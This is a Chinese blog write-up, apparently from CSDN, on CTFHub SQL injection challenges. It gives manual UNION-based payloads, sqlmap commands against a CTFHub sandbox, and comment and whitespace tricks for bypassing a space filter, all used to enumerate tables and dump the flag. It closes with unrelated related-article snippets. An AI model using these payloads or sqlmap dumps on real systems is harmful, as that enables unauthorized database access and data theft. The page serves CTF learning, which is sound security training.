CTFHub(web sql注入)(三)

MYSQL

手工注入

1.判断字段数

输入1

输入2

输入3

得知字段有两个

2.判断注入类型

1 and 1 = 1

1 and 1=2

回显错误,说明存在sql注入

3.查看数据库内容

知道字段数量为2后,可以查看数据库位置

1 union select 1,2

使用union select 1,2查看未发现数据,判断数据可能不存在数据库中,

在id=1中加入负号可以查看到不存在数据库中的数据

-1 union select 1,2

查看数据库版本

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

-1 union select 1,version()

查看数据库名

修改2为database(),查看数据库名,发现数据库名为sqli

-1 union select 1,database()

查看全部数据库名

-1 union select 1,group_concat(schema_name)from information_schema.schemata

4.查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

sqli数据库中发现trbncnizbj和news两个表名(题目环境不同,得到的表名也不相同,注意修改)

5.查看字段名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='trbncnizbj'

查看trbncnizbj表中的全部字段名,发现一个数据名为iosfiklapu

6.查看flag

-1 union select 1,group_concat(iosfiklapu) from sqli.trbncnizbj

查看数据onwodzqnwq中的内容,发现此题flag

或者

3.爆数据库

123 union select 1,database()#

4.爆表名

123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

5.爆字段

vyaosuyeqw(题目环境不同,得到的表名也不相同,注意修改)

123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'vyaosuyeqw'

6.爆flag

rmutuveest

123 union select 1,rmutuveest from vyaosuyeqw

得到flag

sqlmap

http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800

爆数据库名

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 --dbs

爆表名

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

vyaosuyeqw

爆字段

vyaosuyeqw(题目环境不同,得到的表名也不相同,注意修改)

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli -T vyaosuyeqw --columns

爆出flag

rmutuveest

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli -T vyaosuyeqw -C rmutuveest --dump

CTFHub | MySQL结构_ctfhub mysql结构-CSDN博客

CTFHub技能树之WEB MYSQL结构_ctfhubmysql结构-CSDN博客

过滤空格

过滤了空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果

():一对圆括号

+:加号

%09、%0a、%0b、%0c、%0d:TAB水平制表符、换行符、垂直制表符、换页、回车的URL编码形式

/**/:块注释符

题解

注入类型

输入1

构造payload and 1 = 1,发现页面提示Hacker!!!

对空格进行过滤,也就是payload语句中的空格需要使用字符进行过滤

/**/and/**/1/**/=/**/1

1/**/and/**/1/**/=/**/2

等于2时回显错误,说明此题存在过滤空格注入

字段数

使用order by 判断字段数量

1/**/order/**/by/**/1

1/**/order/**/by/**/2

1/**/order/**/by/**/3

使用order by 3,这里无回显,那么字段数量为2列

数据库

查看数据库位置

1/**/union/**/select/**/1,2

使用union select 1,2查看未发现数据

断数据可能不存在数据库中,在id=1中加入负号查看数据

-1/**/union/**/select/**/1,2

查看数据库版本

-1/**/union/**/select/**/1,version()

发现数据库版本为MariaDB 10.3.22

查看数据库名

-1/**/union/**/select/**/1,database()

发现数据库版本为sqli

查看全部数据库名

-1/**/union/**/select/**/1,group_concat(schema_name)from/**/information_schema.schemata

表名

在全部数据库名中发现sqli

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

最后在sqli数据库中发现uavxcnipfh和news两个表名(题目环境不同,得到的表名也不相同,注意修改)

字段

先查看uavxcnipfh表中的全部字段名,

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='uavxcnipfh'

发现一个数据名为gmrdjzkbmr

flag

-1/**/union/**/select/**/1,group_concat(gmrdjzkbmr)/**/from/**/sqli.uavxcnipfh

查看数据gmrdjzkbmr中的内容,发现此题flag

CTFHub | 过滤空格_ctfhub过滤空格-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/571183.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【2023】springboot通过阿里云oss进行文件单个批量文件上传下载

SpringBoot整合阿里OSS实现上传下载 目录💻 前言一、介绍二、阿里云添加oss1、进入oss目录2、创建bucket3、测试上传下载4、创建AccessKey管理账号 三、依赖以及配置1、依赖2、yml3、Config类4、OSSUtil 工具类 四、controller五、测试1、测试上传2、测试删除 前言 …

【调制】π/4-DQPSK信号模型及其相关特性分析 【附MATLAB代码】

MATLAB代码 % pi/4-DQPSK modulation %输入一串数,输出经过差分并映射的I、Q两路数据 ​ function [I,Q]pi4_dqpskmod(data) ​ nlength(data)./2; data1data.*2-1; ​ Idatazeros(1,n); Qdatazeros(1,n); ​ ​ Idatadata1(1,1:2:2*n); %串并变换 Qdatadata1(…

用户中心 -- 代码理解

一、删除表 & if 删除表 1.1 DROP TABLE IF EXISTS user 和 DROP TABLE user 网址: 用户管理第2节课 -- idea 2023.2 创建表--【本人】-CSDN博客 二、 代码 2.1 清空表中数据 的 命令 【truncate 清空】 网址: 用户管理第2节课 -- idea 2…

卡尔曼滤波器(二):Simulink卡尔曼滤波器模块使用

观看MATLAB技术讲座笔记,该技术讲座视频来自bilibili账号:MATLAB中国。 本节在Simulink中用卡尔曼滤波器来滤除传感器噪声,准确估算单摆摆角。 一、单摆模型简介 不考虑摩擦时,下图所示的单摆力学平衡方程为: m l 2…

‍ 太空网络攻击

🧑‍🚀 尤里-加加林成为征服外太空的第一人。他在 1961 年 4 月 12 日的飞行有力地推动了全世界的科技发展。 有趣的事实是:苏联所有首次太空发射(包括加加林的飞行)的弹道计算都是在苏联第一个计算机中心的电子计算机…

从数据库中到处所有表的列、注释、类型、是否必填等信息

从数据库中到处所有中文表名、英文表名、所有列、注释、类型、长度、是否必填等信息,效果如下: 要实现上面的表格可以直接用SQL实现,实现SQL如下: #查询SQL select* FROMinformation_schema.COLUMNS as columns left join (sele…

(七)Idea编辑器集成Tomcat

1. 点击桌面上Idea快捷方式打开Idea编辑器,假如没有创建项目的话打开Idea编辑器后的界面展示如下图所示 2. 点击界面左侧菜单中的自定义 3. 然后点击界面中的“所有设置...”,然后点击“构建、执行、部署”,选择其中的“应用程序服务器” 4. 点击“”按钮…

LeetCode 1052. 爱生气的书店老板

题目链接 https://leetcode.cn/problems/grumpy-bookstore-owner/description/?envTypedaily-question&envId2024-04-23 先把最初的满意人数累加算出来,然后使用滑动窗口来模拟连续 minutes分钟不生气,计算不生气minutes分钟最大的满意数 class S…

【智能算法】吉萨金子塔建造算法(GPC)原理及实现

目录 1.背景2.算法原理2.1算法思想2.2算法过程 3.结果展示4.参考文献 1.背景 2021年,S Harifi等人受到观古代遗迹构造启发,提出了吉萨金子塔建造算法(Giza Pyramids Construction, GPC)。 2.算法原理 2.1算法思想 GPC模拟了古埃…

LeetCode:2385. 感染二叉树需要的总时间(DFS Java)

目录 2385. 感染二叉树需要的总时间 题目描述: 实现代码与解析: DFS 原理思路: 2385. 感染二叉树需要的总时间 题目描述: 给你一棵二叉树的根节点 root ,二叉树中节点的值 互不相同 。另给你一个整数 start 。在第…

文本语音互相转换系统设计

title: 文本语音互相转换系统设计 date: 2024/4/24 21:26:15 updated: 2024/4/24 21:26:15 tags: 需求分析模块化设计性能优化系统安全智能化跨平台区块链 第一部分:导论 第一章:背景与意义 文本语音互相转换系统的定义与作用 文本语音互相转换系统是…

CTFshow-PWN-栈溢出(pwn43)

32位的 system(); 但是好像没"/bin/sh" 上面的办法不行了,想想办法 检查:32 位程序 ida 分析: 跟进 ctfshow 函数 定义了一个长度为 104 的字符数组 s,gets() 函数被用来从标准输入(键盘)中读取…

CU-Mamba:具有通道学习功能的选择性状态空间模型用于图像恢复

CU-Mamba:具有通道学习功能的选择性状态空间模型用于图像恢复 摘要IntroductionRelated WorkMethod CU-Mamba: Selective State Space Models with Channel Learning for Image Restoration 摘要 重建退化图像是图像处理中的关键任务。尽管基于卷积神经网络&#x…

【人工智能基础】人工神经网络

一、人工神经网络的三要素 人工神经元数理模型 MP模型是世界上第一个神经计算模型,为神经网络理论提供了基础 MP模型功能 对树突输入u的线性加权求和对净输入的非线性转换\ 作用函数的功能作用函数的功能 MP神经元模型的作用函数是单位阶跃函数。当x≥0时f(x)…

JTS:Java Topology Suit

接口文档:org.locationtech.jts:jts-core 1.19.0 API。 开发文档:JTS | Documentation。 概述 JTS提供了平面线性几何(planar and linear geometry)与相关的基础几何处理函数(a set of fundamental geometric functions.)。 JTS遵循OGC发布的简单几何规范(Simple Featu…

递归、搜索与回溯算法:综合练习

例题一 解法: 算法思路: ⾸先,我们在第⼀⾏放置第⼀个皇后,然后遍历棋盘的第⼆⾏,在可⾏的位置放置第⼆个皇后,然后再遍历第三⾏,在可⾏的位置放置第三个皇后,以此类推&#xff0c…

nodejs切换

1.卸载nodejs 2.下载nvm工具 3.检查nvm安装情况 nvm -v3.nvm 安装命令 nvm install 10.16.34.查询nodejs版本 nvm list5.切换nodejs版本 nvm use 10.16.3

⑤【Shiro】SpringBoot整合Shiro,实现登录认证

个人简介:Java领域新星创作者;阿里云技术博主、星级博主、专家博主;正在Java学习的路上摸爬滚打,记录学习的过程~ 个人主页:.29.的博客 学习社区:进去逛一逛~ ⑤【Shiro】SpringBoot整合Shiro,实…

精度论文Generative Prompt Model for Weakly Supervised Object Localization

Generative Prompt Model for Weakly Supervised Object Localization 中国科学院大学&&浙江大学CVPR20231.Abstract 当从图像类别标签中学习对象定位模型时,弱监督对象定位(WSOL)仍然具有挑战性, 传统的鉴别训练激活模型的方法忽略了具有代表性但鉴别性较差的对象…

弱光图像增强 | 基于TensorFlowLite+TensorRT加速的MIRNet弱光图像增强实现

项目应用场景 面向弱光图像增强场景,项目基于 MIRNet 弱光图像增强算法,采用 TensorRT TensorFlow-Lite 进行 GPU 算法加速推理。 项目效果 项目细节 > 具体参见项目 README.md (1) 具体参考项目内 jupyter,包括 MIRNet_TFLite.ipynb、M…